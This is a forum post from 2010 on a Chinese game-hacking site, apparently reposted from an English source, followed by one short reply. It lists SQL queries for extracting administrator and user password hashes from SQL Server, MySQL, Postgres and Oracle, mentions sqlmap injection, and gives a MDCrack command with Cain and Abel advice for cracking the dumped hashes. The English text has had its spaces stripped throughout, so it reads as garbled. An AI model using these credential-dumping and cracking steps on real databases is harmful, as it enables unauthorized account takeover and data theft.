WPE|52wpe|我爱WPE

 找回密码
 注册会员
搜索
  • 2274查看
  • 1回复

主题

好友

958

积分

高级会员

发表于 2010-1-29 11:31:51 |显示全部楼层
有没access也可以抓取的?

    各种数据库密码hash获取语句,也可以直接使用sqlmap这个注入工具!

    SQLServer2000:-

    SELECTpasswordfrommaster。dbo。sysxloginswherename='sa'

    0×010034767D5C0CFA5FDCA28C4A56085E65E882E71CB0ED250341

    2FD54D6119FFF04129A1D72E7C3194F7284A7F3A

    0×0100-constantheader

    34767D5C-salt

    0CFA5FDCA28C4A56085E65E882E71CB0ED250341-casesenstivehash

    2FD54D6119FFF04129A1D72E7C3194F7284A7F3A-uppercasehash

    cracktheuppercasehashin'cainandabel'andthenworkthecasesentivehash

    SQLserver2005:-

    SELECTpassword_hashFROMsys。sql_loginswherename='sa'

    0×0100993BF2315F36CC441485B35C4D84687DC02C78B0E680411F

    0×0100-constantheader

    993BF231-salt

    5F36CC441485B35C4D84687DC02C78B0E680411F-casesensitivehash

    crackcasesensitivehashincain,trybruteforceanddictionarybasedattacks。

    update:-followingbernardo'scomments:-

    usefunctionfn_varbintohexstr()tocastpasswordinahexstring。

    e。g。selectnamefromsysxloginsunionallselectmaster。dbo。 fn_varbintohexstr(password)fromsysxlogins

    MYSQL:-

    InMySQLyoucangeneratehashesinternallyusingthepassword(),md5(),orsha1functions。 password()isthefunctionusedforMySQL'sownuserauthenticationsystem。 Itreturnsa16-bytestringforMySQLversionspriorto4。1,anda41- bytestring(basedonadoubleSHA-1hash)forversions4。1andup。 md5()isavailablefromMySQLversion3。23。2andsha1()wasaddedlaterin4。0。2。

    *mysql<4。1

    mysql>SELECTPASSWORD('mypass');

    +——————–+

    |PASSWORD('mypass')|

    +——————–+

    |6f8c114b58f2ce9e|

    +——————–+

    *mysql>=4。1

    mysql>SELECTPASSWORD('mypass');

    +——————————————-+

    |PASSWORD('mypass')|

    +——————————————-+

    |*6C8989366EAF75BB670AD8EA7A7FC1176A95CEF4|

    +——————————————-+

    Selectuser,passwordfrommysql。user

    Thehashescanbecrackedin'cainandabel'

    Postgres:-

    PostgreskeepsMD5-basedpasswordhashesfordatabase- levelusersinthepg_shadowtable。 Youneedtobethedatabasesuperusertoreadthistable(usuallycalled"postgres"or"pgsql")

    selectusename,passwdfrompg_shadow;

    usename|passwd

    ——————+————————————-

    testuser|md5fabb6d7172aadfda4753bf0507ed4396

    usemdcracktocrackthesehashes:-

    $wineMDCrack-sse。exe–algorithm=MD5– append=testuserfabb6d7172aadfda4753bf0507ed4396

    Oracle:-

    selectname,password,spare4fromsys。user$

    hashescouldbecrackedusing'cainandabel'orthc-orakelcrackert11g

    MoreonOraclelater,iamabitbored…。

主题

好友

424

积分

中级会员

发表于 2010-2-2 05:45:21 |显示全部楼层
不错。好东西,不知道管用不。..
回复

使用道具 举报

快速发帖

您需要登录后才可以回帖 登录 | 注册会员

手机版|Archiver|WPE|52wpe|我爱WPE ( 闽ICP备15009081号 )

GMT+8, 2024-5-4 08:59 , Processed in 0.058742 second(s), 16 queries .

返回顶部